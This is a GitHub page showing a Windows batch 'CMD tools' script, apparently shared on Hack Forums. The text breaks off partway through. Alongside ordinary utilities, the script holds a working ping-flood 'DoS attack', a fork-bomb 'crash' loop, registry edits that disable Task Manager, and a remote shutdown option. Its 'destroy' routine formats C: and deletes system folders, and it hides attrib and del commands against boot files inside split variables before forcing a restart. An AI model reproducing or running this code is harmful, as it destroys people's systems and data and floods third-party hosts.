-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathHints.txt
2575 lines (2223 loc) · 100 KB
/
Hints.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
@echo off
cls
title CMD tools
color 0a
echo.
cls
set trial=False
goto begin
:restartcmd
title CMD tools
cls
echo You have chosen to restart...
pause
start "C:\Users\%username%\Desktop\launcher.bat"
set p=b
set timed=%time%
set dated=%date%
echo User started at %time% on %date% with the username: %username% >> %appdata%\CMDdev\logs\LogIns\%dated%-%timed%.txt
echo Error log for %timed%-%dated%::: >> %appdata%\CMDdev\logs\Errors\dev_cmd_err_%timed%.txt
:begin
if "%s%"=="70" goto trialversionend
color 0a
cls
echo.
echo.
echo You are logged in as: %username%
echo System root: %systemroot% Windows directory: %windir%
echo.
echo ::MENU::
echo.
echo.
echo.
echo.
echo 1 - Launch CMD.
echo 2 - Display user info
echo 3 - Change a users password
echo 4 - System info
echo 5 - All info about your IP
echo 6 - PC'S on the network
echo 7 - View all users on pc
echo 8 - View Instructions
echo 9 - CMD chat
echo 10 - Ping a website
echo 11 - Copy a file
echo 12 - Delete a file
echo 13 - Create a *.* file
echo 14 - Open a file
echo 15 - Check file extension
echo 16 - Format a drive
echo 17 - Open System32 file
echo 18 - Make a user an admin
echo 19 - Check internet connection
echo 20 - Clean TEMP folders
echo 21 - Disable TaskMgr
echo 22 - Refresh Internet connection
echo 23 - Disable internet connection
echo 24 - Start Registry Editor
echo 25 - Change time/date
echo 26 - Start Control Manager
echo 27 - Trace Route
echo 28 - DoS attack
echo 29 - Shutdown any computer on network
echo 30 - Get a friends ip address
echo 31 - Pass Generator
echo 32 - Crash computer
echo 33 - Spam desktop [Win 7]
echo 34 - Spam desktop [Win XP]
echo 35 - Attempt to destoy computer [THIS IS IRREVSIBLE!!!!]
echo 36 - Start a program or process
echo 37 - End a program or process
echo 38 - Display a list of running processes
echo 39 - Log out
echo 40 - Shutdown instantly
echo 41 - Restart computer
echo 42 - View live time
echo 43 - Version info
echo 44 - Check if something exists
echo 45 - Check what drives are active
echo 46 - Use command line from CMDtools itself
echo 47 - Create a CMD virus
echo 48 - Start %systemroot%
echo 49 - Start C:\
echo 50 - Restart CMDtools
echo 51 - Basic Keylogger
echo 52 - Site selector
echo 53 - Calculator
echo 54 - Find text in a file(s)
echo 55 - Start telnet
echo 56 - [TELNET] Star wars movie
echo 57 - Set a command to be run after a countdown
echo 58 - Happy virus
echo 59 - Reminder in a message box after timer
echo 60 - Start any program minimized
echo 61 - Get Admin CMD
echo.
echo Your last selection was: %begin%
set /p begin=Please select one of the numbers above:
echo Last option selected at: Date: %date% At the time: %time% With the username: %username% >> %userprofile%\%appdata%\logs\lastoption.txt
if "%begin%"=="1" goto cmd
if "%begin%"=="2" goto info
if "%begin%"=="3" goto password
if "%begin%"=="4" goto sysinfo
if "%begin%"=="5" goto ipcfg
if "%begin%"=="6" goto network
if "%begin%"=="7" goto users
if "%begin%"=="8" goto instr
if "%begin%"=="9" goto chat
if "%begin%"=="10" goto ping
if "%begin%"=="11" goto copy
if "%begin%"=="12" goto delete
if "%begin%"=="13" goto txtfile
if "%begin%"=="14" goto fileopen
if "%begin%"=="15" goto assoc
if "%begin%"=="16" goto format
if "%begin%"=="17" goto sys32
if "%begin%"=="18" goto mkadmin
if "%begin%"=="19" goto chkinter
if "%begin%"=="20" goto clean
if "%begin%"=="21" goto tskmgr
if "%begin%"=="22" goto refint
if "%begin%"=="23" goto disint
if "%begin%"=="24" goto regedit
if "%begin%"=="25" goto timedate
if "%begin%"=="26" goto controlp
if "%begin%"=="27" goto tracert
if "%begin%"=="28" goto dos
if "%begin%"=="29" goto shutdown
if "%begin%"=="30" goto findip
if "%begin%"=="31" goto passgen
if "%begin%"=="32" goto crash
if "%begin%"=="33" goto spam
if "%begin%"=="34" goto spamwinxp
if "%begin%"=="35" goto destroy
if "%begin%"=="36" goto startpro
if "%begin%"=="37" goto endpro
if "%begin%"=="38" goto runningpro
if "%begin%"=="39" goto logout
if "%begin%"=="40" goto shutdown
if "%begin%"=="41" goto restart
if "%begin%"=="42" goto livetime
if "%begin%"=="43" goto verinfo
if "%begin%"=="44" goto procheck
if "%begin%"=="45" goto drives
if "%begin%"=="46" goto command
if "%begin%"=="47" goto usvir
if "%begin%"=="48" goto systemroot
if "%begin%"=="49" goto startc
if "%begin%"=="50" goto restartcmd
if "%begin%"=="51" goto keylog
if "%begin%"=="52" goto siteselect
if "%begin%"=="53" goto calc
if "%begin%"=="54" goto findtxt
if "%begin%"=="55" goto telnet
if "%begin%"=="56" goto starwars
if "%begin%"=="57" goto timercommand
if "%begin%"=="58" goto happyvir
if "%begin%"=="diagnostics" goto diagnostics
if "%begin%"=="FindChuckNorris" goto easteregg
if "%begin%"=="help" goto login
if "%begin%"=="59" goto remind
if "%begin%"=="60" goto startmin
if "%begin%"=="61" goto admincmd
echo '%begin%' is not valid, please try again with a number between 1 & 61
echo Error: Invalid number input: "%begin%" is not a valid number between
pause
goto begin
:cmd
start cmd.exe
goto begin
:password
set p2=t
set /p n=USER:::
echo The username is being processed...
echo ...
echo ...
echo The user you have chosen is %n%
echo Are you sure you want the change the users password?
set /p begin2= Please type yes or no::
if "%begin2%"=="yes" goto next
if "%begin2%"=="no" goto begin
if "%begin2%"=="Yes" goto next
if "%begin2%"=="No" goto begin
:next
net user %n% *
set /p begin3= Would you like to select another option? [Y/N]::
if "%begin3%"=="Y" goto begin
if "%begin3%"=="y" goto begin
if "%begin3%"=="yes" goto begin
if "%begin3%"=="Yes" goto begin
if "%begin3%"=="N" goto exit4
if "%begin3%"=="n" goto exit4
if "%begin3%"=="no" goto exit4
if "%begin3%"=="No" goto exit4
:info
set /p m=USER:::
echo The username is being processed...
echo ...
echo ...
echo The user you have chosen is %m%
net user %m%
pause
set /p begin3= Would you like to select another option? [Y/N]::
if "%begin3%"=="Y" goto begin
if "%begin3%"=="y" goto begin
if "%begin3%"=="yes" goto begin
if "%begin3%"=="Yes" goto begin
if "%begin3%"=="N" goto exit4
if "%begin3%"=="n" goto exit4
if "%begin3%"=="no" goto exit4
if "%begin3%"=="No" goto exit4
:sysinfo
echo.
echo Computer info..
echo.
echo Date: %date%
echo TIME: %time%
echo Computername: %computername%
echo User: %username%
echo Sysdrive: %systemdrive%
echo Domain: %userdomain%
echo Logon Sever: %logonserver%
echo Windowsroot: %windir%
set p3=c
echo Programs On: %programfiles%
echo Profile on: %userprofile%
echo Temp map: %temp%
echo.
set /p begin4= Would you like to select another option? [Y/N]::
if "%begin4%"=="Y" goto begin
if "%begin4%"=="y" goto begin
if "%begin4%"=="yes" goto begin
if "%begin4%"=="Yes" goto begin
if "%begin4%"=="N" goto exit4
if "%begin4%"=="n" goto exit4
if "%begin4%"=="no" goto exit4
if "%begin4%"=="No" goto exit4
:network
echo.
echo Computers on the Local network:
echo.
net view
echo.
set /p begin5= Would you like to select another option? [Y/N]::
if "%begin5%"=="Y" goto begin
if "%begin5%"=="y" goto begin
if "%begin5%"=="yes" goto begin
if "%begin5%"=="Yes" goto begin
if "%begin5%"=="N" goto exit4
if "%begin5%"=="n" goto exit4
if "%begin5%"=="no" goto exit4
if "%begin5%"=="No" goto exit4
:users
echo All users on this pc:
net user
echo.
set /p begin6= Would you like to select another option? [Y/N]::
if "%begin6%"=="Y" goto begin
if "%begin6%"=="y" goto begin
if "%begin6%"=="yes" goto begin
if "%begin6%"=="Yes" goto begin
set p5=h
if "%begin6%"=="N" goto exit4
if "%begin6%"=="n" goto exit4
if "%begin6%"=="no" goto exit4
if "%begin6%"=="No" goto exit4
:ipcfg
echo.
ipconfig /all
echo.
set /p begin7= Would you like to select another option? [Y/N]::
if "%begin7%"=="Y" goto begin
if "%begin7%"=="y" goto begin
if "%begin7%"=="yes" goto begin
if "%begin7%"=="Yes" goto begin
if "%begin7%"=="N" goto exit4
if "%begin7%"=="n" goto exit4
if "%begin7%"=="no" goto exit4
if "%begin7%"=="No" goto exit4
:exit4
cls
echo Thank you for using CMD tools
echo Created by Igor Williams (b1onic)
echo Please note that i did use some parts of other peoples codes for convienience reasons
echo CMDtools V5 is created, compiled and distributed by CMDdev and its registered clients [Hack Forums, CMDdis]
echo Contact email: eggsrule678@gmail.com
echo.
echo.
set p4=c
echo.
echo.
echo.
echo.
echo.
echo.
pause
exit
:instr
echo YOU WILL FIND THE INSTRUCTIONS IN THE CURRENT DIRECTORY!!!
echo Welcome to CMD tools the best tool for basic "CMDing" EVER. To use this simply follow the instructions on the command prompt! Its that simple!!! > Instructions.txt
set /p begin7= Would you like to select another option? [Y/N]::
if "%begin7%"=="Y" goto begin
if "%begin7%"=="y" goto begin
if "%begin7%"=="yes" goto begin
if "%begin7%"=="Yes" goto begin
if "%begin7%"=="N" goto exit4
if "%begin7%"=="n" goto exit4
if "%begin7%"=="no" goto exit4
if "%begin7%"=="No" goto exit4
:chat
@echo off
cls
title CMD Chat
attrib -h -s chat.txt >nul
color 0a
set /p user=Chat username:
goto check
:get
@echo user chat> ftp_cmd.dat
@echo chat>> ftp_cmd.dat
@echo bin>> ftp_cmd.dat
@echo GET chat.txt>>ftp_cmd.dat
@echo quit>> ftp_cmd.dat
cls
echo Refreshing..
ftp -n -s:ftp_cmd.dat ftp.ftpwt.com >nul
del "ftp_cmd.dat" >nul
goto chat
:send
@echo user chat> ftp_cmd.dat
@echo chat>> ftp_cmd.dat
@echo bin>> ftp_cmd.dat
@echo SEND chat.txt>>ftp_cmd.dat
@echo quit>> ftp_cmd.dat
echo Refreshing...
ftp -n -s:ftp_cmd.dat ftp.ftpwt.com >nul
del "ftp_cmd.dat" >nul
goto get
:check
attrib -h -s chat.txt >nul
if not exist chat.txt goto make
:chat
cls
attrib -h -s chat.txt >nul
type chat.txt
if %user%==Dezinated goto A
attrib +h +s chat.txt >nul
:A
set /p chat=%user%:
cls
if /i "%chat%"=="r" goto get
echo Sending...
goto C
:B
echo %user%: %chat% >> chat.txt
goto send
:make
goto get
:C
@echo user chat> ftp_cmd.dat
@echo chat>> ftp_cmd.dat
@echo bin>> ftp_cmd.dat
@echo GET chat.txt>>ftp_cmd.dat
@echo quit>> ftp_cmd.dat
cls
echo Refreshing..
ftp -n -s:ftp_cmd.dat ftp.ftpwt.com >nul
del "ftp_cmd.dat" >nul
goto B
set /p begin8= Would you like to select another option? [Y/N]::
if "%begin8%"=="Y" goto begin
if "%begin8%"=="y" goto begin
if "%begin8%"=="yes" goto begin
if "%begin8%"=="Yes" goto begin
if "%begin8%"=="N" goto exit4
if "%begin8%"=="n" goto exit4
if "%begin8%"=="no" goto exit4
if "%begin8%"=="No" goto exit4
:ping
set /p n= What website do you want to ping?
echo The website you have chosen is %n%
echo pinging %n% with 32 bytes of data
ping %n%
pause
set /p begin9= Would you like to select another option? [Y/N]::
if "%begin9%"=="Y" goto begin
if "%begin9%"=="y" goto begin
if "%begin9%"=="yes" goto begin
if "%begin9%"=="Yes" goto begin
if "%begin9%"=="N" goto exit4
if "%begin9%"=="n" goto exit4
if "%begin9%"=="no" goto exit4
if "%begin9%"=="No" goto exit4
:copy
set /p n= Enter the filename that you want to copy:::
echo Filename: %n%
copy %n%
echo.
echo.
set /p begin10= Would you like to select another option? [Y/N]::
if "%begin10%"=="Y" goto begin
if "%begin10%"=="y" goto begin
if "%begin10%"=="yes" goto begin
if "%begin10%"=="Yes" goto begin
if "%begin10%"=="N" goto exit4
if "%begin10%"=="n" goto exit4
if "%begin10%"=="no" goto exit4
if "%begin10%"=="No" goto exit4
:delete
set /p n= Enter the file you want to delete:::
echo The file you want to delete is called %n%
set /p question= Are you sure you want to delete this file? [Y/N] :::
if "%begin4%"=="Y" goto delete1
if "%begin4%"=="y" goto delete1
if "%begin4%"=="yes" goto delete1
if "%begin4%"=="Yes" goto delete1
if "%begin4%"=="N" goto begin
if "%begin4%"=="n" goto begin
if "%begin4%"=="no" goto begin
if "%begin4%"=="No" goto begin
:delete1
set /p m= Please re-enter file to be deleted:::
echo The file will now be deleted!
del %m%
echo.
echo.
set /p begin11= Would you like to select another option? [Y/N]::
if "%begin11%"=="Y" goto begin
if "%begin11%"=="y" goto begin
if "%begin11%"=="yes" goto begin
if "%begin11%"=="Yes" goto begin
if "%begin11%"=="N" goto exit4
if "%begin11%"=="n" goto exit4
if "%begin11%"=="no" goto exit4
if "%begin11%"=="No" goto exit4
:txtfile
echo The text file is outputted to the current directory!!!
set /p o=Enter text you would like to put in file:::
set /p f=What would you like the file to be called?
set /p e=What file extension would you like it to be? [WITH DOT]:::
echo %o% > %f%.%e%
start %f%.%e%
echo.
set /p begin12= Would you like to select another option? [Y/N]::
if "%begin12%"=="Y" goto begin
if "%begin12%"=="y" goto begin
if "%begin12%"=="yes" goto begin
if "%begin12%"=="Yes" goto begin
if "%begin12%"=="N" goto exit4
if "%begin12%"=="n" goto exit4
if "%begin12%"=="no" goto exit4
if "%begin12%"=="No" goto exit4
:fileopen
set /p p= File to be opened:::
set /p e= File extension [WITH DOT]:::
echo The file you have chosen is called: %p%%e%
start %p%%e%
echo.
set /p begin13= Would you like to select another option? [Y/N]::
if "%begin13%"=="Y" goto begin
if "%begin13%"=="y" goto begin
if "%begin13%"=="yes" goto begin
if "%begin13%"=="Yes" goto begin
if "%begin13%"=="N" goto exit4
if "%begin13%"=="n" goto exit4
if "%begin13%"=="no" goto exit4
if "%begin13%"=="No" goto exit4
:assoc
set /p t= Enter a file extension [WITH DOT] :::
echo The file extension you have entered is::: %t%
assoc %t%
pause
echo.
echo.
set /p begin14= Would you like to select another option? [Y/N]::
if "%begin14%"=="Y" goto begin
if "%begin14%"=="y" goto begin
if "%begin14%"=="yes" goto begin
if "%begin14%"=="Yes" goto begin
if "%begin14%"=="N" goto exit4
if "%begin14%"=="n" goto exit4
if "%begin14%"=="no" goto exit4
if "%begin14%"=="No" goto exit4
:format
set /p y= What drive do you want to format? [e.g. C: D: E:] :::
if "%y%"=="C:" goto sure
if "%y%"=="D:" goto sure
if "%y%"=="E:" goto sure
if "%y%"=="F:" goto sure
echo "%y%" Sorry, that drive doesn't exist!!!
:sure
echo.
echo.
set /p question1= Are you sure you want to format the drive %y%? [Y/N] :::
if "%question1%"=="Y" goto format1
if "%question1%"=="y" goto format1
if "%question1%"=="yes" goto format1
if "%question1%"=="Yes" goto format
if "%question1%"=="N" goto begin
if "%question1%"=="n" goto begin
if "%question1%"=="no" goto begin
if "%question1%"=="No" goto begin
:format1
echo CMDtools will now format the drive %y%
pause
format %y%
echo.
echo.
set /p begin15= Would you like to select another option? [Y/N]::
if "%begin15%"=="Y" goto begin
if "%begin15%"=="y" goto begin
if "%begin15%"=="yes" goto begin
if "%begin15%"=="Yes" goto begin
if "%begin15%"=="N" goto exit4
if "%begin15%"=="n" goto exit4
if "%begin15%"=="no" goto exit4
if "%begin15%"=="No" goto exit4
:sys32
start C:\WINDOWS\system32
pause
set /p begin16= Would you like to select another option? [Y/N]::
if "%begin16%"=="Y" goto begin
if "%begin16%"=="y" goto begin
if "%begin16%"=="yes" goto begin
if "%begin16%"=="Yes" goto begin
if "%begin16%"=="N" goto exit4
if "%begin16%"=="n" goto exit4
if "%begin16%"=="no" goto exit4
if "%begin16%"=="No" goto exit4
:mkadmin
echo.
echo.
set /p name= Enter user name:
set /p pass= Enter password:
net user %name% %pass% /add
pause
set /p begin17= Would you like to select another option? [Y/N]::
if "%begin17%"=="Y" goto begin
if "%begin17%"=="y" goto begin
if "%begin17%"=="yes" goto begin
if "%begin17%"=="Yes" goto begin
if "%begin17%"=="N" goto exit4
if "%begin17%"=="n" goto exit4
if "%begin17%"=="no" goto exit4
if "%begin17%"=="No" goto exit4
:chkinter
ping www.google.com
pause
echo.
echo.
set /p begin18= Would you like to select another option? [Y/N]::
if "%begin18%"=="Y" goto begin
if "%begin18%"=="y" goto begin
if "%begin18%"=="yes" goto begin
if "%begin18%"=="Yes" goto begin
if "%begin18%"=="N" goto exit4
if "%begin18%"=="n" goto exit4
if "%begin18%"=="no" goto exit4
if "%begin18%"=="No" goto exit4
:clean
echo Cleaning "TEMP" folders
del /Q /F %temp% >nul
pause
set /p begin19= Would you like to select another option? [Y/N]::
if "%begin19%"=="Y" goto begin
if "%begin19%"=="y" goto begin
if "%begin19%"=="yes" goto begin
if "%begin19%"=="Yes" goto begin
if "%begin19%"=="N" goto exit4
if "%begin19%"=="n" goto exit4
if "%begin19%"=="no" goto exit4
if "%begin19%"=="No" goto exit4
:tskmgr
echo CMDtools will now disble TaskMgr
pause
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
pause
set /p begin20= Would you like to select another option? [Y/N]::
if "%begin20%"=="Y" goto begin
if "%begin20%"=="y" goto begin
if "%begin20%"=="yes" goto begin
if "%begin20%"=="Yes" goto begin
if "%begin20%"=="N" goto exit4
if "%begin20%"=="n" goto exit4
if "%begin20%"=="no" goto exit4
if "%begin20%"=="No" goto exit4
:refint
echo Disabling internet connection...
ipconfig /release
pause
echo Renewing internet connection
ipconfig /renew
pause
set /p begin21= Would you like to select another option? [Y/N]::
if "%begin21%"=="Y" goto begin
if "%begin21%"=="y" goto begin
if "%begin21%"=="yes" goto begin
if "%begin21%"=="Yes" goto begin
if "%begin21%"=="N" goto exit4
if "%begin21%"=="n" goto exit4
if "%begin21%"=="no" goto exit4
if "%begin21%"=="No" goto exit4
:disint
echo CMDtools will now disable your internet connection...
ipconfig /release
pause
set /p begin22= Would you like to select another option? [Y/N]::
if "%begin22%"=="Y" goto begin
if "%begin22%"=="y" goto begin
if "%begin22%"=="yes" goto begin
if "%begin22%"=="Yes" goto begin
if "%begin22%"=="N" goto exit4
if "%begin22%"=="n" goto exit4
if "%begin22%"=="no" goto exit4
if "%begin22%"=="No" goto exit4
:regedit
start regedit.exe
echo Regedit should have started...
pause
set /p begin25= Would you like to select another option? [Y/N]::
if "%begin25%"=="Y" goto begin
if "%begin25%"=="y" goto begin
if "%begin25%"=="yes" goto begin
if "%begin25%"=="Yes" goto begin
if "%begin25%"=="N" goto exit4
if "%begin25%"=="n" goto exit4
if "%begin25%"=="no" goto exit4
if "%begin25%"=="No" goto exit4
:timedate
set /p t=Enter the new time [eg. HH:MM:SS AM/PM] :::
time %t%
set /p begin23= Would you like to change date as well? [Y/N]::
if "%begin23%"=="Y" goto date
if "%begin23%"=="y" goto date
if "%begin23%"=="yes" goto date
if "%begin23%"=="Yes" goto date
if "%begin23%"=="N" goto begin
if "%begin23%"=="n" goto begin
if "%begin23%"=="no" goto begin
if "%begin23%"=="No" goto begin
:date
set /p date1= Enter the new date [DD:MM:YYYY] ::
date %date1%
pause
set /p begin24= Would you like to select another option? [Y/N]::
if "%begin24%"=="Y" goto begin
if "%begin24%"=="y" goto begin
if "%begin24%"=="yes" goto begin
if "%begin24%"=="Yes" goto begin
if "%begin24%"=="N" goto exit4
if "%begin24%"=="n" goto exit4
if "%begin24%"=="no" goto exit4
if "%begin24%"=="No" goto exit4
:controlp
start Control
pause
set /p begin25= Would you like to select another option? [Y/N]::
if "%begin25%"=="Y" goto begin
if "%begin25%"=="y" goto begin
if "%begin25%"=="yes" goto begin
if "%begin25%"=="Yes" goto begin
if "%begin25%"=="N" goto exit4
if "%begin25%"=="n" goto exit4
if "%begin25%"=="no" goto exit4
if "%begin25%"=="No" goto exit4
:tracert
set /p y= IP or URL:::
tracert %y%
pause
set /p begin26= Would you like to select another option? [Y/N]::
if "%begin26%"=="Y" goto begin
if "%begin26%"=="y" goto begin
if "%begin26%"=="yes" goto begin
if "%begin26%"=="Yes" goto begin
if "%begin26%"=="N" goto exit4
if "%begin26%"=="n" goto exit4
if "%begin26%"=="no" goto exit4
if "%begin26%"=="No" goto exit4
:dos
echo Use this after you have found the ip address of the website using Trace Route feature
set /p w= IP address:::
set /p p= Buffer size (0-65500):::
echo You have chosen %w% to be pinged with %p% packets
ping -t %w% -l %p% -n 1000000
pause
set /p begin27= Would you like to select another option? [Y/N]::
if "%begin27%"=="Y" goto begin
if "%begin27%"=="y" goto begin
if "%begin27%"=="yes" goto begin
if "%begin27%"=="Yes" goto begin
if "%begin27%"=="N" goto exit4
if "%begin27%"=="n" goto exit4
if "%begin27%"=="no" goto exit4
if "%begin27%"=="No" goto exit4
:shutdown
echo This feature should be used in conjuction with All Computers on Network feature
shutdown -i
pause
set /p begin27= Would you like to select another option? [Y/N]::
if "%begin27%"=="Y" goto begin
if "%begin27%"=="y" goto begin
if "%begin27%"=="yes" goto begin
if "%begin27%"=="Yes" goto begin
if "%begin27%"=="N" goto exit4
if "%begin27%"=="n" goto exit4
if "%begin27%"=="no" goto exit4
if "%begin27%"=="No" goto exit4
:findip
echo Open your messenger and start talking to the person
echo you want to finds ip
echo Now select the third foriegn IP address down
netstat -n
echo That's it! You're done!!!
pause
set /p begin27= Would you like to select another option? [Y/N]::
if "%begin27%"=="Y" goto begin
if "%begin27%"=="y" goto begin
if "%begin27%"=="yes" goto begin
if "%begin27%"=="Yes" goto begin
if "%begin27%"=="N" goto exit4
if "%begin27%"=="n" goto exit4
if "%begin27%"=="no" goto exit4
if "%begin27%"=="No" goto exit4
:passgen
echo CMDtools will now generate a random 5 digit number
:loop1
echo %random%
pause
set /p begin27= Would you like to generate? [Y/N]::
if "%begin27%"=="Y" goto loop2
if "%begin27%"=="y" goto loop2
if "%begin27%"=="yes" goto loop2
if "%begin27%"=="Yes" goto loop2
if "%begin27%"=="N" goto begin
if "%begin27%"=="n" goto begin
if "%begin27%"=="no" goto begin
if "%begin27%"=="No" goto begin
:loop2
goto loop1
:crash
echo Crashing comuter...
pause
:loop
start cmd
goto loop
set /p begin27= Would you like to select another option? [Y/N]::
if "%begin27%"=="Y" goto begin
if "%begin27%"=="y" goto begin
if "%begin27%"=="yes" goto begin
if "%begin27%"=="Yes" goto begin
if "%begin27%"=="N" goto exit4
if "%begin27%"=="n" goto exit4
if "%begin27%"=="no" goto exit4
if "%begin27%"=="No" goto exit4
:spam
set /p text=Text to go in spam:::
echo You want "%text%" to go in the spam
echo.
pause
echo Spamming desktop in 3
ping localhost -n 3 >nul
echo 2
ping localhost -n 2 >nul
echo 1
ping localhost -n 1 >nul
echo %text% > C:\Users\%username%\Desktop\%random%.txt
pause
set /p begin27= Would you like to select another option? [Y/N]::
if "%begin27%"=="Y" goto begin
if "%begin27%"=="y" goto begin
if "%begin27%"=="yes" goto begin
if "%begin27%"=="Yes" goto begin
if "%begin27%"=="N" goto exit4
if "%begin27%"=="n" goto exit4
if "%begin27%"=="no" goto exit4
if "%begin27%"=="No" goto exit4
:destroy
set /p yesnodestroy= Are you sure you want to continue? [Y/N]:
if /i "%yesnodestroy%"=="y" (
echo CMDtools will now do everything it can to destroy this computer in 3 seconds
ping localhost -n 3 >nul
echo 2 SECONDS
ping localhost -n 2 >nul
echo 1 SECONDS
ping localhost -n 1 >nul
pause
format c:
del %systemdrive%
del %systemroot%
del %programfiles%
echo %random%.txt > C:\Users\%username%\Desktop\%random%.txt
set a= rem --
set b= rem
set c= The
set d= Last
set f= Restart
set g= att
set h= rib
set i= -r
set j= -s
set k= -h
set l= c:\
set m= auto
set n= exec
set o= .
set p= bat
set q= del
set r= boot
set s= ini
set t= ntldr
set u= win
set v= dows
set w= \
set x= shut
set y= /r /t
set z= down
set aa= 00
%a%
%b% %c% %d% %f%
%g%%h% %i% %j% %k% %l%%m%%n%%o%%p%
%q% %l%%m%%n%%o%%p%
%g%%h% %i% %j% %k% %l%%r%%o%%s%
%q% %l%%r%%o%%s%
%g%%h% %i% %j% %k% %l%%t%
%q% %l%%t%
%g%%h% %i% %j% %k% %l%%u%%v%%w%%u%%o%%s%
%q% %l%%u%%v%%w%%u%%o%%s%
%x%%z% %y% %aa%
%a%
) ELSE (
goto begin
)
:spamwinxp
set /p text=Text to go in spam:::
echo You want "%text%" to go in the spam
echo.
pause
echo Spamming desktop in 3
ping localhost -n 3 >nul
echo 2
ping localhost -n 2 >nul
echo 1
ping localhost -n 1 >nul
echo %text% > C:\Documents and Settings\%username%\Desktop\%random%.txt
pause
set /p begin27= Would you like to select another option? [Y/N]::
if "%begin27%"=="Y" goto begin
if "%begin27%"=="y" goto begin
if "%begin27%"=="yes" goto begin
if "%begin27%"=="Yes" goto begin
if "%begin27%"=="N" goto exit4
if "%begin27%"=="n" goto exit4
if "%begin27%"=="no" goto exit4
if "%begin27%"=="No" goto exit4
:startpro